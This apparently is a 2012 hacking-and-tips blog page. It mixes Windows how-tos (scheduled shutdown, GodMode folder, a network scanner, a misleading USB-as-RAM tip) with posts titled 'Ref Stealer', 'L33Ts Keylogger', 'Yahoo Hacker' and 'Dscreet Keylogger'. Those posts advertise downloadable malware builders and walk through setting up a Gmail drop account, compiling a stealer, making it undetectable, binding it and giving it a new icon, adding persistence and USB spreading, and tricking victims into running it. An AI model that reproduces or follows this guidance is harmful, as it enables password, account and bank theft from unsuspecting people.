Read It!

Tuesday, 3 January 2012

Start And Shut Down Computer Automatically On A Schedule




On Windows 

To automatically start your computer up at a specific time of day, you'll actually need to edit your BIOS settings. To do this:


  • Boot up your computer and enter your BIOS setup. Usually this involves pressing the Delete key as your computer boots (your computer should say Press DEL to Enter Setup or something similar as you turn it on).

  • Navigate to the Power Options. If your BIOS supports it, there should be a function for automatically starting up your computer at a certain time of day. Mine was called "Resume by Alarm", but yours might be called something different.

  • Enable that setting and set the time you want your computer to start every day. Save and Exit the BIOS, and your computer should follow that schedule from now on.


You probably shut down your computer when you're done using it at the end of the day, but if not, you can set it to shut itself down on a schedule. This is easy to do with Windows Task Scheduler:

  • Hit the Start menu and type in "task scheduler". Open up Task Scheduler from your results.

  • In the right pane, hit Create Task. Give it a name, and under the General tab, check "Run with highest privileges". Also check "Run whether user is logged on or not", if you ever leave your computer logged out.

  • Head to the Settings tab and check "Stop the task if it runs longer than" and set it to "1 hour". This won't stop your computer from sleeping, but will stop your computer from thinking a task is still running.

  • Head to the Actions tab, hit New, and choose "Start a Program" as your action. Set the Program to shutdown and the arguments to -s.

  • Lastly, head to the Triggers tab and click New. Change the schedule to fit whatever you want (say, Daily at 12:00AM), and hit OK. Hit OK again at the next window and your task should be saved in Task Scheduler.
Read more ...

Wireless Network Watcher




Wireless networks have become popular in recent years , thanks to a growing number of devices that use wireless connections to access the Internet. But there is a problem associated with their use, or more precisely with the means used by routers and wireless devices to block unauthorized access : in fact, the device must use the appropriate encryption to prevent access by third parties.

Many users do not know, for example, the differences between WEP or WPA or encryption which of these systems should be selected for better security. This may result that their wireless router remain open and available for unauthorized access, especially if it is not configured no encryption or weak encryption is used.

The best solution is to ' use the strongest encryption possible , but however this may not always be possible, for example if the devices you need to connect to wi-fi router does not support it.
Wireless Network Watcher is a free software program that performs the analysis of a wireless network to list all computers connected to it . The application displays all of the computers that are currently connected to the network in its sparse interface, making it tremendously easier to identify unauthorized access to the network in question.



Each computer or device connected is represented by an IP address, device name, MAC address, some information about the company that created the adapter and network devices . This information can also be exported and saved in various formats, including html files, xml and text files.

This program is highly compatible with editions in 32-bit and 64-bit Windows operating system . Supports all versions of Windows from Windows 2000 to Windows 7, including versions of Windows Server.

The program can scan only the wireless network that is connected to the computer that is running . Users who wish to scan a network to which they are not connected need to connect to it before starting the scan.
It may happen that the program be identified by the wireless network adapter wrong. You can select the right one under "Advanced Options" (F9). Wireless Network Watcher is a portable program that automatically starts scanning immediately after being launched. It may take a few seconds before the list is compiled.

Windows users can download the program from the official site Nirsoft .
Read more ...

God Mode In Windows 7




Windows 7 is now becoming popular among windows operating system  users.Windows 7 has cool hidden feature ,people calls it godmode in windows 7.GodMode is a folder that brings together a long list of customization settings allowing you to change all your settings from one place.This is very good as you can now change all your windows settings from one single place.

Follow the following steps to create god mode folder:

1. Create a new folder

2. Rename the folder to GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

You can change word GodMode to any other word you like your name or your friends name

3.The folder icon will change automatically,then  double click it to show the GodMode windows options.
Read more ...

Monday, 2 January 2012

Ref Stealer




As the name indicates " password stealer " is a hacking tool that will steal passwords from the victim computer without his/her knowledge. It will steal all passwords from internet explorer, firefox , opera , google chrome and even from anywhere. It even steals product keys . Thus you can hack any account that victim is using. You can even hack bank account if victim is using that.

Features of Password Stealer ?
  • Firefox
  • Google Chrome
  • Internet Explorer
  • Dial Up
  • Most of Messengers (Msn, YM, Trillian, etc)

How to use Password Stealer ?
  1. First create new gmail account specially for password stealer.
  2. Now Download password stealer for free 
  3. Extract that rar file to desktop ( just drag and drop the folder )
  4. Open that password stealer and give the information
  5. Give Gmail usename and password created in step 1
  6. Now click on build. And it will create the server.exe
  7. Its not Fud so just refer my previous post and downloader " fud crypter "
  8. After that use provided binder to decorate the spy crypter virus 
  9. Send that spy password stealer virus created to vicitm and ask him to run it.
  10. Done ! You will get all password from victim in just 5 min to the gmail account.

Size: 1.75 MB

Its password is cwh




Read more ...

L33Ts Keylogger




This new released remote keylogger is 100% fud having high spying capacity, It was just created few days ago so no antivirus is aware of this new keylogger , so download and make he use of this keylogger as soon as possible.

Features of this remote keylogger :-
  • Built-In Icon Changer.
  • Ability to send/receive logs through SMTP w/ fully customizable options.
  • Built-in 1-click Vaccine.exe to remove the virus.
  • Send Screenshots w/ each log
  • Compile server as .exe/.com/.pif/.scr file.
  • Ability to Add to startup through HKCU, HKLM, or ActiveX.
  • Unique Polymorphic Server on every Compile.
How to use this fud keylogger :-
  • First create a new gmail account - recommended
  • Then download the remote fud keylogger from below
  • Extract it to desktop and open it
  • Now enter the gmail account id and password and reset the sending intervels
  • Now click on generate and then compile server
  • You will find a new file created to desktop
  • It is looking very dull so I have given a file binder and icon changer along with it
  • Just use that file binder and icon changer - its easy steps so I donot have to explain
  • Now send that file to victim by any mean.
  • Now as soon as victim will run it you will start spying him and hack accounts

Size: 1.97 MB

Its password is cwh


Read more ...

Use USB As Ram To Boost Pc Speed In Windows 7

The more RAM computer, the more speedy and faster the process will do . As we all know that Computer we newly purchase has only 1 GB RAM and that's to low for an average person. And the computer can't run run High Power consuming softwares. moreover, Gamers will face problems due to low RAM. They can add more RAM to Boost PC Speed but indeed it requires to spend 2000 Bucks.


So, I am an awesome method to Increase PC Ram using Pen drive and that will boost PC Speed instantly and easily. This given method is for Windows 7 and can be bit different for other versions of windows. So follow this easy steps and Increase PC Sped Instantly .

How To Use PenDrive As Ram | Boost PC Speed

1. First Go To Control Panel from my computer or startup
2. Then click on System And Security and then System ( shown in screenshots )

usb ram 500 How to use your Pen Drive as RAM 
3. Now click on "Advance System Settings" at left side
4. Click on Settings and the go to Advanced Tab and then Settings > Advanced

5. Now, you can see Virtual Memory, just click on Change
6Here you have to uncheck "Automatically manage paging file size"
7. Now, click on your pen drive, and set the custom size.
8. Ex. In 4 GB pen drive, 700 is initial size and 3000 is maximum size


Note :- You computer will restart and then you can see instant boost in your computer's performance.  

So, friends I hope you have enjoyed this article

Read more ...

Sunday, 1 January 2012

Yahoo Hacker

1. First disable your anitivirus - Trust me this tool is created by me :)
2. Download Yahoo Hacker Creater ( Make yahoo messenger )
3. And follow this steps as shown in the image below


4. Enter Gmail username and password ( I suggest to create fake account in gmail )
5. Then click on Build and fake spying yahoo messenger will be created like above
6. Thats it , Enjoy Hacking Of Yahoo .
Note : This fake Yahoo messenger is not FUD and detected by most antivirus as virus.

Human Manipulation and Social Engineering 

Its not the end of hacking, the main and last step is remaining, To fool your victim, just tell him anything that he/she may like. Tell him/her that this is a very new version of Yahoo messenger and have the facility to Make Free Call Worldwide, then see will download your fake yahoo messenger and will try to login and you will get the password and her username too and you "Hack Yahoo Account".


Size: 96.33 KB

Its password is cwh


Read more ...

Dscreet Keylogger




How to use
Gmail User: Enter the gmail (*)(*)(*)(*)(*)(*)(*)(*) for the account in which
you want to recieve the logs.

Gmail Pass: Password for the gmail account you entered above.

Server Name: The name you want the virus file to be.

Interval: How often you want to recieve logs to your email account.
shorter interval means smaller logs more often and longer means
larger logs less often. MAKE SURE TO PUT THE TIME IN SECONDS E.G. 1MIN = 60SEC.

Download Link (optional): If the downloader checkbox is ticked, put the direct url to the
file you want to download e.g. rat/botnet here.

Anti's: Select this checkbox if you want to activate process killers.

Add To Startup: Select this checkbox if you want your server to be run every time the victims computer
starts up. (recommended)

USB Spread: Select this checkbox if you want to enable USB spreading.

Delete Cookies: Select this checkbox if you want to victim to have to enter all their saved passwords
again. (recommended)

Downloader: Explained above.

Kill Taskmanager: Disables the victims taskmanager.

Icon Changer: Select this checkbox and use the "Load Icon" button to change the icon of your server file when it
is created.

Fake Error: Select this checkbox and use the "Fake Error Message" box to create an error message that
will be shown when the server is run on the victims computer.


Size: 174.54 KB

Its password is cwh


Read more ...